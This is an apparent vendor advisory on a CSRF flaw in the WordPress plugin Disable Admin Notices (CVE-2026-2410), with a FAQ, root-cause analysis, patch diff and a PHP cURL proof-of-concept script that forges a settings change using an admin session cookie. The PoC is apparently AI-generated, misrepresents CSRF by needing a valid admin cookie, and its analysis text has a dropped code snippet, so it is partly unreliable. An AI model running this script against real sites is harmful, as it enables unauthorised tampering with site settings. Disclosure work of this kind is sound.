What is CVE-2026-2410?

CVE-2026-2410 is a Cross-Site Request Forgery (CSRF) vulnerability found in the Disable Admin Notices plugin for WordPress, affecting versions up to and including 1.4.2. It allows unauthenticated attackers to manipulate the plugin’s settings by tricking an authenticated administrator into submitting a forged request.

How does this vulnerability work?

The vulnerability arises from a lack of nonce validation in the plugin’s `showPageContent()` function. Attackers can craft a malicious link that, when clicked by an administrator, sends a POST request to the plugin’s settings page, allowing them to add arbitrary URLs to the blocked redirects list.

Who is affected by CVE-2026-2410?

Any WordPress site using the Disable Admin Notices plugin version 1.4.2 or earlier is affected. Site administrators should verify their plugin version to determine if they are vulnerable to this issue.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Disable Admin Notices plugin and verify if the version is 1.4.2 or earlier.

How can I fix CVE-2026-2410?

The vulnerability has been patched in version 1.4.3 of the Disable Admin Notices plugin. Update the plugin to the latest version to ensure that nonce validation is in place and to prevent exploitation.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider deactivating the Disable Admin Notices plugin until you can apply the patch. Additionally, ensure that administrators are cautious about clicking links from untrusted sources.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it requires user interaction for exploitation, it poses a risk that could lead to unauthorized changes in the plugin settings, potentially disrupting site functionality.

What is nonce validation and why is it important?

Nonce validation is a security measure used in WordPress to verify that a request to perform an action comes from a legitimate source. It helps prevent CSRF attacks by ensuring that the request includes a token that is unique to the user’s session.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can use a crafted POST request to exploit the vulnerability. By simulating an authenticated request with the necessary parameters, the attacker can add a malicious URL to the blocked redirects list without the administrator’s consent.

What are the potential impacts of this vulnerability?

Exploitation of this vulnerability allows an attacker to modify the plugin’s blocked redirects list, which could lead to legitimate URLs being blocked. This may disrupt administrative tasks and could potentially cause a denial-of-service condition for site administrators.

What should I do if I suspect my site has been exploited?

If you suspect that your site has been exploited, immediately check the blocked redirects list in the Disable Admin Notices plugin settings. Remove any unauthorized entries and update the plugin to the latest version to secure your site.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2410: Disable Admin Notices – Hide Dashboard Notifications <= 1.4.2 – Cross-Site Request Forgery to Plugin Settings Update (disable-admin-notices)

CVE ID CVE-2026-2410

Plugin disable-admin-notices

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.4.2

Patched Version 1.4.3

Disclosed February 23, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2410:
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the WordPress Disable Admin Notices plugin, versions 1.4.2 and earlier. The vulnerability allows attackers to modify the plugin’s blocked redirects list by tricking an authenticated administrator into submitting a forged request. The CVSS score of 4.3 reflects a medium severity issue requiring user interaction for exploitation.

Atomic Edge research identified the root cause in the `showPageContent()` function within the file `disable-admin-notices/admin/pages/class-pages-edit-redirects.php`. The function processes POST requests to add URLs to the `blocked_redirects` option array. The code at line 103 checks for the `$_POST[‘wdan_add_block’]` parameter but lacks any nonce verification before executing the update logic. This missing security check allows forged requests to be processed as legitimate.

Exploitation requires an attacker to craft a malicious link or webpage that sends a POST request to the WordPress admin area where the plugin’s settings page is loaded. The request must target the plugin’s administrative interface and include the parameter `wdan_add_block` with a value and the `wdan_redirect_url` parameter containing the attacker-controlled URL to block. An attacker would lure an administrator with the necessary privileges to click the link while authenticated, triggering the unauthorized settings change.

The patch adds CSRF protection using WordPress’s nonce system. In the diff, line 104 adds a call to `check_admin_referer(‘wdan_add_block_redirect’)` within the conditional block that processes the POST request. This function verifies the presence and validity of a nonce token. Line 120 inserts “ within the HTML form to generate the required security token. These changes ensure that any request to modify the blocked redirects list must include a cryptographically secure token tied to the user’s session, preventing forgery.

Successful exploitation allows an unauthenticated attacker to add arbitrary URLs to the plugin’s blocked redirects list. This could disrupt website functionality by blocking legitimate administrative or update URLs, potentially causing a denial-of-service condition for administrators. While the direct impact is limited to modifying this specific plugin setting, it demonstrates a lack of CSRF protection that could be indicative of broader security hygiene issues within the codebase.

Differential between vulnerable and patched code

Code Diff

--- a/disable-admin-notices/admin/pages/class-pages-edit-redirects.php
+++ b/disable-admin-notices/admin/pages/class-pages-edit-redirects.php
@@ -101,6 +101,7 @@
 		$redirects = $this->getPopulateOption( 'blocked_redirects', [] );

 		if ( isset( $_POST['wdan_add_block'] ) ) {
+			check_admin_referer( 'wdan_add_block_redirect' );
 			$url = $this->request()->post( 'wdan_redirect_url', null, 'sanitize_url' );

 			if ( ! empty( $url ) ) {
@@ -116,6 +117,7 @@
 		<div style="padding:15px;">
 			<h4><?php esc_html_e( 'Block ad redirects', 'disable-admin-notices' ); ?></h4>
 			<form method="post">
+				<?php wp_nonce_field( 'wdan_add_block_redirect' ); ?>
 				<label for="wdan-redirect-url"><?php esc_html_e( 'Enter url for block', 'disable-admin-notices'); ?></label><br>
 				<input id="wdan-redirect-url" style="width:400px;" type="text" name="wdan_redirect_url">
 				<input type="submit" name="wdan_add_block" class="button" value="<?php esc_attr_e( 'Add block', 'disable-admin-notices' ); ?>">
--- a/disable-admin-notices/disable-admin-notices.php
+++ b/disable-admin-notices/disable-admin-notices.php
@@ -4,7 +4,7 @@
  * Plugin URI: https://clearfy.pro/disable-admin-notices
  * Description: Disable admin notices plugin gives you the option to hide updates warnings and inline notices in the admin panel.
  * Author: Themeisle
- * Version: 1.4.2
+ * Version: 1.4.3
  * Text Domain: disable-admin-notices
  * Domain Path: /languages/
  * Author URI: https://themeisle.com
--- a/disable-admin-notices/vendor/composer/installed.php
+++ b/disable-admin-notices/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'codeinwp/disable-admin-notices',
-        'pretty_version' => 'v1.4.2',
-        'version' => '1.4.2.0',
-        'reference' => '0936ab92f27b6062050b8a7a356e45fc8893566b',
+        'pretty_version' => 'v1.4.3',
+        'version' => '1.4.3.0',
+        'reference' => 'd0b007757b91fe07810ecd8790b15fcffb8b3448',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'codeinwp/disable-admin-notices' => array(
-            'pretty_version' => 'v1.4.2',
-            'version' => '1.4.2.0',
-            'reference' => '0936ab92f27b6062050b8a7a356e45fc8893566b',
+            'pretty_version' => 'v1.4.3',
+            'version' => '1.4.3.0',
+            'reference' => 'd0b007757b91fe07810ecd8790b15fcffb8b3448',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2410 - Disable Admin Notices – Hide Dashboard Notifications <= 1.4.2 - Cross-Site Request Forgery to Plugin Settings Update
<?php
// CONFIGURATION
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=disable-admin-notices-redirects';
$malicious_redirect_url = 'http://attacker-controlled-site.com/malicious-redirect';
$admin_cookie = 'wordpress_logged_in_abc123=...'; // Replace with a valid admin session cookie

// CSRF Exploit Payload
$post_data = array(
    'wdan_add_block' => 'Add block',
    'wdan_redirect_url' => $malicious_redirect_url
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

// Set the admin session cookie to simulate an authenticated request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Cookie: ' . $admin_cookie,
    'Content-Type: application/x-www-form-urlencoded'
));

// Execute the forged request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check for successful exploitation
if ($http_code == 200 && strpos($response, 'Redirect added') !== false) {
    echo "[SUCCESS] CSRF exploit executed. Malicious URL added to blocked redirects list.n";
} else {
    echo "[FAILURE] Exploit may have failed. Check admin session and target URL.n";
}
?>

Frequently Asked Questions

What is CVE-2026-2410?
Understanding the vulnerability
CVE-2026-2410 is a Cross-Site Request Forgery (CSRF) vulnerability found in the Disable Admin Notices plugin for WordPress, affecting versions up to and including 1.4.2. It allows unauthenticated attackers to manipulate the plugin’s settings by tricking an authenticated administrator into submitting a forged request.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of nonce validation in the plugin’s `showPageContent()` function. Attackers can craft a malicious link that, when clicked by an administrator, sends a POST request to the plugin’s settings page, allowing them to add arbitrary URLs to the blocked redirects list.
Who is affected by CVE-2026-2410?
Identifying vulnerable users
Any WordPress site using the Disable Admin Notices plugin version 1.4.2 or earlier is affected. Site administrators should verify their plugin version to determine if they are vulnerable to this issue.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Disable Admin Notices plugin and verify if the version is 1.4.2 or earlier.
How can I fix CVE-2026-2410?
Mitigation steps
The vulnerability has been patched in version 1.4.3 of the Disable Admin Notices plugin. Update the plugin to the latest version to ensure that nonce validation is in place and to prevent exploitation.
What if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider deactivating the Disable Admin Notices plugin until you can apply the patch. Additionally, ensure that administrators are cautious about clicking links from untrusted sources.
What does the CVSS score of 4.3 mean?
Understanding severity levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it requires user interaction for exploitation, it poses a risk that could lead to unauthorized changes in the plugin settings, potentially disrupting site functionality.
What is nonce validation and why is it important?
Security mechanism explained
Nonce validation is a security measure used in WordPress to verify that a request to perform an action comes from a legitimate source. It helps prevent CSRF attacks by ensuring that the request includes a token that is unique to the user’s session.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an attacker can use a crafted POST request to exploit the vulnerability. By simulating an authenticated request with the necessary parameters, the attacker can add a malicious URL to the blocked redirects list without the administrator’s consent.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability allows an attacker to modify the plugin’s blocked redirects list, which could lead to legitimate URLs being blocked. This may disrupt administrative tasks and could potentially cause a denial-of-service condition for site administrators.
What should I do if I suspect my site has been exploited?
Response to potential exploitation
If you suspect that your site has been exploited, immediately check the blocked redirects list in the Disable Admin Notices plugin settings. Remove any unauthorized entries and update the plugin to the latest version to secure your site.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations